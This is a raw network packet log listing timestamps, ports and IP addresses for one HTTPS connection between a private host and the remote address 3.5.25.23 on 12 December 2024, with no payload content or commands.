Dec 12, 2024 17:35:45.356205940 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.356261015 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.356296062 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.356312037 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.356339931 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.362222910 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.362276077 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.362298965 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.362334967 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.362361908 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.362382889 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.366766930 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.366794109 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.366842031 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.366864920 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.366889000 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.366942883 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.367197990 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.372276068 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.372322083 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.372364998 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.372385979 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.372432947 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.418338060 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.418363094 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.465205908 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.527127028 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.527168989 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.527220011 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.527225971 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.527261019 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.527302027 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.527302027 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.527337074 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.527393103 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.527406931 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.532538891 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.532567024 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.532603025 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.532612085 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.532764912 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.538352966 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.538431883 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.538436890 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.538475990 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.538507938 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.544095993 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.544157028 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.544194937 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.544224977 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.544248104 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.550157070 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.550215960 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.550250053 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.550271034 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.550292969 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.555617094 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.555671930 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.555705070 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.555717945 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.555742979 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.561436892 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.561492920 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.561522961 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.561537027 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.561583042 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.605829954 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.605844021 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.652740955 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.716681957 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.716696978 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.716738939 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.716753006 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.716769934 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.716794014 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.716810942 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.716825008 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.721905947 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.721930027 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.721963882 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.722023964 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.722023964 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.722033024 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.727643013 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.727677107 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.727735043 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.727742910 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.727752924 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.733329058 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.733366966 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.733421087 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.733443022 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.733468056 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.739003897 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.739077091 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.739121914 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.739130974 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.739162922 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.744968891 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.745040894 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.745055914 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.745063066 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.745102882 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.745151043 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.745265007 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.750845909 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.750890017 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.750946045 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.750965118 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.750988960 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.751043081 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.751055002 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.756455898 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.756505013 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.756534100 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.756541014 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.756567955 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.809000015 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.809021950 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.855849028 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.911161900 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.911180019 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.911201954 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.911231995 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.911273956 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.911290884 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.911324978 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.911324978 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.911331892 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.911416054 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.916446924 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.916481972 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.916527987 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.916539907 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.916564941 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.922151089 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.922168970 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.922240019 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.922252893 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.922272921 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.927783966 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.927838087 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.927875042 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.927891016 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.927906990 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.933731079 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.933770895 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.933804989 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.933804989 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.933819056 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.933845043 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.933872938 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.939495087 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.939518929 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.939575911 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.939590931 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.939600945 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.939637899 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.945234060 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.945255041 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.945322990 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.945333958 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:45.996462107 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:45.996489048 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.043349981 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.100761890 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.100778103 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.100814104 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.100825071 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.100924969 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.100944996 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.100960016 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.106079102 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.106101036 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.106137037 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.106149912 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.106159925 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.106200933 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.112202883 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.112242937 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.112267971 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.112284899 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.112294912 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.112320900 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.112344027 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.119421959 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.119440079 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.119488001 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.119534016 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.119548082 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.119559050 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.124191999 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.124217033 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.124291897 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.124300957 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.124310970 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.129184961 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.129241943 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.129276991 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.129283905 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.129308939 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.135263920 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.135302067 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.135355949 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.135365009 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.135375023 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.135396957 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.140969038 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.140988111 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.141060114 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.141067982 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.144757032 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.144766092 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.147062063 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.307459116 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.307488918 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.307528019 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.307559013 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.307578087 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.307600021 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.313019991 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.313040018 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.313076019 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.313083887 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.313100100 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.321233034 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.321250916 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.321337938 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.321346998 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.324316978 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.324336052 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.324385881 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.324393034 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.324423075 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.330245972 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.330300093 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.330336094 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.330343962 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.330378056 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.336078882 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.336117983 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.336148024 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.336157084 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.336164951 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.336205006 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.342401981 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.342417955 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.342447996 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.342583895 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.342583895 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.342592001 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.387065887 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.497222900 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.497250080 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.497339010 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.497354031 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.497383118 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.497392893 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.497400999 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.503346920 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.503371000 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.503417015 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.503427982 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.503468037 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.508729935 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.508749962 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.508789062 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.508800030 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.508811951 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.513746977 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.513776064 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.513818979 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.513828993 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.513860941 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.520001888 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.520019054 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.520081997 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.520092010 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.524949074 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.524969101 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.525012970 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.525022030 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.525033951 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.530298948 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.530318022 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.530389071 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.530399084 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.536009073 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.536030054 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.536076069 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.536098003 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.536109924 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.590197086 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.690063000 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.690078020 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.690149069 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.690150976 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.690175056 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.690222025 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.695024014 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.695050955 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.695095062 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.695105076 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.695113897 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.695143938 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.700767994 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.700802088 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.700838089 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.700849056 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.700860977 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.700889111 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.706516027 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.706541061 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.706584930 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.706594944 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.706605911 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.706634045 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.713865042 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.713938951 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.713952065 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.713959932 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.713993073 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.719563007 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.719609976 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.719643116 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.719649076 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.719676971 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.719696999 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.722935915 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.722984076 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.723004103 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.723011017 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.723023891 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.723066092 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.723134041 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.727729082 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.727773905 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.727797985 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:46.727806091 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:46.727837086 CET	49708	443	192.168.2.8	3.5.25.23
